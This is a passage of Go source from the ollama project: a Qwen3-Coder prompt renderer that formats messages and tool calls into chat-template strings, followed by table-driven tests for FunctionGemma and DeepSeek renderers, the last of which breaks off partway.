nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3coder.go
model/renderers/qwen3coder.go
package renderers import ( "encoding/json" "fmt" "reflect" "strings" "github.com/ollama/ollama/api" ) var ( imStartTag = "<|im_start|>" imEndTag = "<|im_end|>" ) // renderAdditionalKeys renders all JSON fields except the ones in handledKeys // This follows the same approach from the reference implementation, which gives // a particular key ordering func renderAdditionalKeys(obj any, handledKeys map[string]bool) string { data, err := json.Marshal(obj) if err != nil { return "" } var m map[string]any if err := json.Unmarshal(data, &m); err != nil { return "" } var sb strings.Builder for key, value := range m { if handledKeys[key] { continue } // Check if value is a map or array (needs JSON serialization) switch v := value.(type) { case map[string]any, []any: jsonBytes, _ := json.Marshal(v) // TODO(drifkin): it would be nice to format the JSON here similarly to // python's default json.dumps behavior (spaces after commas and colons). // This would let us be byte-for-byte compatible with the reference // implementation for most common inputs jsonStr := string(jsonBytes) sb.WriteString("\n<" + key + ">" + jsonStr + "</" + key + ">") case nil: continue default: // Simple types, convert to string sb.WriteString("\n<" + key + ">" + fmt.Sprintf("%v", value) + "</" + key + ">") } } return sb.String() } type Qwen3CoderRenderer struct{} func (r *Qwen3CoderRenderer) Render(messages []api.Message, tools []api.Tool, _ *api.ThinkValue) (string, error) { var sb strings.Builder // filter out system messages and choose the first (if any) to win var systemMessage string var filteredMessages []api.Message for _, message := range messages { if message.Role != "system" { filteredMessages = append(filteredMessages, message) continue } if systemMessage == "" { systemMessage = message.Content } } if systemMessage != "" || len(tools) > 0 { sb.WriteString(imStartTag + "system\n") // if we have tools but no system message, match the reference implementation by providing a default system 
message if systemMessage == "" { systemMessage = "You are Qwen, a helpful AI assistant that can interact with a computer to solve tasks." } sb.WriteString(systemMessage) if len(tools) > 0 { sb.WriteString("\n\n# Tools\n\nYou have access to the following functions:\n\n") sb.WriteString("<tools>") for _, tool := range tools { sb.WriteString("\n") sb.WriteString("<function>\n") sb.WriteString("<name>" + tool.Function.Name + "</name>") if tool.Function.Description != "" { sb.WriteString("\n<description>" + tool.Function.Description + "</description>") } sb.WriteString("\n<parameters>") for name, prop := range tool.Function.Parameters.Properties.All() { sb.WriteString("\n<parameter>") sb.WriteString("\n<name>" + name + "</name>") if len(prop.Type) > 0 { sb.WriteString("\n<type>" + formatToolDefinitionType(prop.Type) + "</type>") } if prop.Description != "" { sb.WriteString("\n<description>" + prop.Description + "</description>") } // Render any additional keys not already handled handledKeys := map[string]bool{ "type": true, "description": true, } sb.WriteString(renderAdditionalKeys(prop, handledKeys)) sb.WriteString("\n</parameter>") } // Render extra keys for parameters (everything except 'type' and 'properties') paramHandledKeys := map[string]bool{ "type": true, "properties": true, } sb.WriteString(renderAdditionalKeys(tool.Function.Parameters, paramHandledKeys)) sb.WriteString("\n</parameters>") sb.WriteString("\n</function>") } sb.WriteString("\n</tools>") sb.WriteString("\n\nIf you choose to call a function ONLY reply in the following format with NO suffix:\n\n<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within 
<tool_call></tool_call> XML tags\n- Required parameters MUST be specified\n- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n</IMPORTANT>") } sb.WriteString(imEndTag + "\n") } for i, message := range filteredMessages { lastMessage := i == len(filteredMessages)-1 prefill := lastMessage && message.Role == "assistant" switch message.Role { case "assistant": if len(message.ToolCalls) > 0 { sb.WriteString(imStartTag + "assistant\n") if message.Content != "" { sb.WriteString(message.Content + "\n") } for _, toolCall := range message.ToolCalls { sb.WriteString("\n<tool_call>\n<function=" + toolCall.Function.Name + ">") for name, value := range toolCall.Function.Arguments.All() { valueStr := formatToolCallArgument(value) sb.WriteString("\n<parameter=" + name + ">\n" + valueStr + "\n</parameter>") } sb.WriteString("\n</function>\n</tool_call>") } sb.WriteString("<|im_end|>\n") } else { sb.WriteString(imStartTag + "assistant\n") sb.WriteString(message.Content) if !prefill { sb.WriteString(imEndTag + "\n") } } case "tool": // consecutive tool responses should share a single `<im_start>user`, but // have their own <tool_response> tags // only start a new user block if this is the first tool response if i == 0 || filteredMessages[i-1].Role != "tool" { sb.WriteString(imStartTag + "user\n") } sb.WriteString("<tool_response>\n") sb.WriteString(message.Content) sb.WriteString("\n</tool_response>\n") // close the user block only if this is the last tool response if i == len(filteredMessages)-1 || filteredMessages[i+1].Role != "tool" { sb.WriteString(imEndTag + "\n") } default: sb.WriteString(imStartTag + message.Role + "\n") sb.WriteString(message.Content) sb.WriteString(imEndTag + "\n") } if lastMessage && !prefill { sb.WriteString(imStartTag + "assistant\n") } } 
return sb.String(), nil } func formatToolCallArgument(value any) string { if value == nil { return "null" } switch v := value.(type) { case string: return v case []byte: return string(v) } if reflect.TypeOf(value) != nil { kind := reflect.TypeOf(value).Kind() if kind == reflect.Map || kind == reflect.Slice || kind == reflect.Array { if marshalled, err := json.Marshal(value); err == nil { return string(marshalled) } } } return fmt.Sprintf("%v", value) } func formatToolDefinitionType(tp api.PropertyType) string { if len(tp) == 0 { return "[]" } if len(tp) == 1 { return tp[0] } // TODO(drifkin): it would be nice to format the JSON here similarly to // python's default json.dumps behavior (spaces after commas and colons). // This would let us be byte-for-byte compatible with the reference // implementation for most common inputs jsonBytes, err := json.Marshal(tp) if err != nil { return "[]" } return string(jsonBytes) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/functiongemma_test.go
model/renderers/functiongemma_test.go
package renderers import ( "testing" "github.com/ollama/ollama/api" "github.com/stretchr/testify/assert" ) func TestFunctionGemmaRenderer(t *testing.T) { tests := []struct { name string messages []api.Message tools []api.Tool expected string }{ { name: "basic_user_message", messages: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<bos><start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n", }, { name: "with_system_message", messages: []api.Message{ {Role: "system", Content: "You are helpful"}, {Role: "user", Content: "Hello!"}, }, expected: "<bos><start_of_turn>developer\nYou are helpful<end_of_turn>\n<start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n", }, { name: "with_developer_role", messages: []api.Message{ {Role: "developer", Content: "You are a coding assistant"}, {Role: "user", Content: "Hello!"}, }, expected: "<bos><start_of_turn>developer\nYou are a coding assistant<end_of_turn>\n<start_of_turn>user\nHello!<end_of_turn>\n<start_of_turn>model\n", }, { name: "custom_system_message_with_tools", messages: []api.Message{ {Role: "system", Content: "You are a weather expert."}, {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, // Custom system message is preserved, tools are appended expected: "<bos><start_of_turn>developer\nYou are a weather expert.\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { 
name: "developer_role_with_tools", messages: []api.Message{ {Role: "developer", Content: "Be concise."}, {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, // Developer role message is preserved, tools are appended expected: "<bos><start_of_turn>developer\nBe concise.\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "multi_turn", messages: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello!"}, {Role: "user", Content: "More"}, }, expected: "<bos><start_of_turn>user\nHi<end_of_turn>\n<start_of_turn>model\nHello!<end_of_turn>\n<start_of_turn>user\nMore<end_of_turn>\n<start_of_turn>model\n", }, { name: "with_tools", messages: []api.Message{ {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get 
weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "tool_call", messages: []api.Message{ {Role: "user", Content: "Weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>", }, { name: "assistant_content_with_tool_call", messages: []api.Message{ {Role: "user", Content: "Weather?"}, { Role: "assistant", Content: "Let me check.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: 
testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\nLet me check.<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>", }, { name: "numeric_arguments", messages: []api.Message{ {Role: "user", Content: "Add"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "add", Arguments: testArgs(map[string]any{"a": float64(1), "b": float64(2)}), }, }, }, }, {Role: "tool", Content: "3"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "add", Description: "Add numbers", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "a": {Type: api.PropertyType{"number"}}, "b": {Type: api.PropertyType{"number"}}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:add{description:<escape>Add numbers<escape>,parameters:{properties:{a:{description:<escape><escape>,type:<escape>NUMBER<escape>},b:{description:<escape><escape>,type:<escape>NUMBER<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nAdd<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:add{a:1,b:2}<end_function_call><start_function_response>response:add{<escape>3<escape>}<end_function_response>", }, { name: "empty_messages", messages: 
[]api.Message{}, expected: "<bos><start_of_turn>model\n", }, { name: "tool_with_required_params", messages: []api.Message{ {Role: "user", Content: "Weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Gets the weather for a given city", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"city"}, Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City Name"}, "country": {Type: api.PropertyType{"string"}, Description: "Country Name"}, }), }, }, }, }, // Required params are escaped: required:[<escape>city<escape>] expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Gets the weather for a given city<escape>,parameters:{properties:{city:{description:<escape>City Name<escape>,type:<escape>STRING<escape>},country:{description:<escape>Country Name<escape>,type:<escape>STRING<escape>}},required:[<escape>city<escape>],type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n", }, { name: "multiple_tools", messages: []api.Message{ {Role: "user", Content: "Weather and time?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "get_time", Description: "Get current time", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"}, }), }, }, }, }, // Multiple tool declarations are consecutive expected: 
"<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><start_function_declaration>declaration:get_time{description:<escape>Get current time<escape>,parameters:{properties:{timezone:{description:<escape>Timezone<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather and time?<end_of_turn>\n<start_of_turn>model\n", }, { name: "parallel_tool_calls", messages: []api.Message{ {Role: "user", Content: "Weather and time?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, { Function: api.ToolCallFunction{ Name: "get_time", Arguments: testArgs(map[string]any{"timezone": "UTC"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, {Role: "tool", Content: "12:00"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "get_time", Description: "Get current time", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "timezone": {Type: api.PropertyType{"string"}, Description: "Timezone"}, }), }, }, }, }, // Multiple tool calls and responses are consecutive expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get 
weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><start_function_declaration>declaration:get_time{description:<escape>Get current time<escape>,parameters:{properties:{timezone:{description:<escape>Timezone<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather and time?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_call>call:get_time{timezone:<escape>UTC<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response><start_function_response>response:get_time{<escape>12:00<escape>}<end_function_response>", }, { name: "user_after_tool_response", messages: []api.Message{ {Role: "user", Content: "Weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, {Role: "user", Content: "Thanks! 
What about London?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "City"}, }), }, }, }, }, // User message after tool response gets concatenated (user reverted to this behavior) expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:get_weather{description:<escape>Get weather<escape>,parameters:{properties:{city:{description:<escape>City<escape>,type:<escape>STRING<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nWeather?<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:get_weather{city:<escape>Paris<escape>}<end_function_call><start_function_response>response:get_weather{<escape>Sunny<escape>}<end_function_response>Thanks! 
What about London?<end_of_turn>\n<start_of_turn>model\n", }, // Edge cases { name: "tool_empty_properties", messages: []api.Message{ {Role: "user", Content: "Test"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "test_fn", Description: "", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{}), }, }, }, }, // Empty properties are omitted expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test_fn{description:<escape><escape>,parameters:{type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n", }, { name: "unicode_content", messages: []api.Message{ {Role: "user", Content: "こんにちは 🎉"}, }, expected: "<bos><start_of_turn>user\nこんにちは 🎉<end_of_turn>\n<start_of_turn>model\n", }, { name: "newlines_in_content", messages: []api.Message{ {Role: "user", Content: "Line 1\nLine 2\nLine 3"}, }, expected: "<bos><start_of_turn>user\nLine 1\nLine 2\nLine 3<end_of_turn>\n<start_of_turn>model\n", }, { name: "special_chars_in_content", messages: []api.Message{ {Role: "user", Content: "Test <tag> & \"quotes\" chars"}, }, expected: "<bos><start_of_turn>user\nTest <tag> & \"quotes\" chars<end_of_turn>\n<start_of_turn>model\n", }, { name: "boolean_argument", messages: []api.Message{ {Role: "user", Content: "Set flag"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "set_flag", Arguments: testArgs(map[string]any{"enabled": true}), }, }, }, }, {Role: "tool", Content: "done"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "set_flag", Description: "Set a flag", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "enabled": {Type: api.PropertyType{"boolean"}, Description: "Flag value"}, }), }, }, }, }, expected: 
"<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:set_flag{description:<escape>Set a flag<escape>,parameters:{properties:{enabled:{description:<escape>Flag value<escape>,type:<escape>BOOLEAN<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nSet flag<end_of_turn>\n<start_of_turn>model\n<start_function_call>call:set_flag{enabled:true}<end_function_call><start_function_response>response:set_flag{<escape>done<escape>}<end_function_response>", }, { name: "multiple_required_params", messages: []api.Message{ {Role: "user", Content: "Test"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "test", Description: "Test", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"a", "b", "c"}, Properties: testPropsMap(map[string]api.ToolProperty{ "a": {Type: api.PropertyType{"string"}, Description: "A"}, "b": {Type: api.PropertyType{"string"}, Description: "B"}, "c": {Type: api.PropertyType{"string"}, Description: "C"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test{description:<escape>Test<escape>,parameters:{properties:{a:{description:<escape>A<escape>,type:<escape>STRING<escape>},b:{description:<escape>B<escape>,type:<escape>STRING<escape>},c:{description:<escape>C<escape>,type:<escape>STRING<escape>}},required:[<escape>a<escape>,<escape>b<escape>,<escape>c<escape>],type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n", }, { name: "array_type_param", messages: []api.Message{ {Role: "user", Content: "Test"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "test", Description: "Test", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: 
testPropsMap(map[string]api.ToolProperty{ "items": {Type: api.PropertyType{"array"}, Description: "List of items"}, }), }, }, }, }, expected: "<bos><start_of_turn>developer\nYou can do function calling with the following functions:<start_function_declaration>declaration:test{description:<escape>Test<escape>,parameters:{properties:{items:{description:<escape>List of items<escape>,type:<escape>ARRAY<escape>}},type:<escape>OBJECT<escape>}}<end_function_declaration><end_of_turn>\n<start_of_turn>user\nTest<end_of_turn>\n<start_of_turn>model\n", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { renderer := &FunctionGemmaRenderer{} result, err := renderer.Render(tt.messages, tt.tools, nil) assert.NoError(t, err) assert.Equal(t, tt.expected, result) }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/deepseek3_test.go
model/renderers/deepseek3_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestDeepSeekRenderer(t *testing.T) { tests := []struct { name string messages []api.Message tools []api.Tool thinkValue *api.ThinkValue expected string }{ { name: "basic user message", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Hello, how are you?<|Assistant|></think>`, }, { name: "basic with system message", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant.<|User|>Hello, how are you?<|Assistant|></think>`, }, { name: "multiple system messages", messages: []api.Message{ {Role: "system", Content: "First instruction"}, {Role: "system", Content: "Second instruction"}, {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>First instruction Second instruction<|User|>Hello<|Assistant|></think>`, }, { name: "thinking enabled", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Hello, how are you?<|Assistant|><think>`, }, { name: "thinking enabled with system", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>You are a helpful assistant.<|User|>Hello, how are you?<|Assistant|><think>`, }, { name: "conversation with assistant response", messages: []api.Message{ {Role: "user", Content: "What is the capital of France?"}, {Role: "assistant", Content: "The capital of France is Paris."}, {Role: "user", Content: "Fantastic!"}, }, thinkValue: 
&api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What is the capital of France?<|Assistant|></think>The capital of France is Paris.<|end▁of▁sentence|><|User|>Fantastic!<|Assistant|></think>`, }, { name: "assistant with tool calls", messages: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "assistant with content and tool calls", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", Content: "I'll check the weather for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Paris?<|Assistant|></think>I'll check the weather for you.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "tool response", messages: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What's the 
weather?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>`, }, { name: "multiple tool calls", messages: []api.Message{ {Role: "user", Content: "Get weather for Paris and London"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "London", }), }, }, }, }, {Role: "tool", Content: "Paris: 22°C, Sunny"}, {Role: "tool", Content: "London: 18°C, Cloudy"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Get weather for Paris and London<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"London"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Paris: 22°C, Sunny<|tool▁output▁end|><|tool▁output▁begin|>London: 18°C, Cloudy<|tool▁output▁end|>`, }, { name: "content with </think> tag removal", messages: []api.Message{ {Role: "user", Content: "Think about this"}, {Role: "assistant", Content: "I'm thinking about this.</think>The answer is 42."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Think about this<|Assistant|></think>The answer is 42.<|end▁of▁sentence|>`, }, { name: "empty system message", messages: []api.Message{ {Role: "system", Content: ""}, {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Hello<|Assistant|></think>`, }, { name: "empty assistant content", messages: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: ""}, }, thinkValue: &api.ThinkValue{Value: 
false}, expected: `<|begin▁of▁sentence|><|User|>Hello<|Assistant|></think><|end▁of▁sentence|>`, }, { name: "special characters", messages: []api.Message{ {Role: "user", Content: "What about <|special|> tokens and \"quotes\"?"}, {Role: "assistant", Content: "They're handled normally."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>What about <|special|> tokens and "quotes"?<|Assistant|></think>They're handled normally.<|end▁of▁sentence|>`, }, { name: "tool calls with null content", messages: []api.Message{ {Role: "user", Content: "Get weather"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Get weather<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "assistant after tool context", messages: []api.Message{ {Role: "user", Content: "Process data"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "process", Arguments: testArgs(map[string]any{ "data": "test", }), }, }, }, }, {Role: "tool", Content: "Success"}, {Role: "assistant", Content: "Done"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Process data<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>process<|tool▁sep|>{"data":"test"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Success<|tool▁output▁end|>Done<|end▁of▁sentence|>`, }, { name: "no messages", messages: 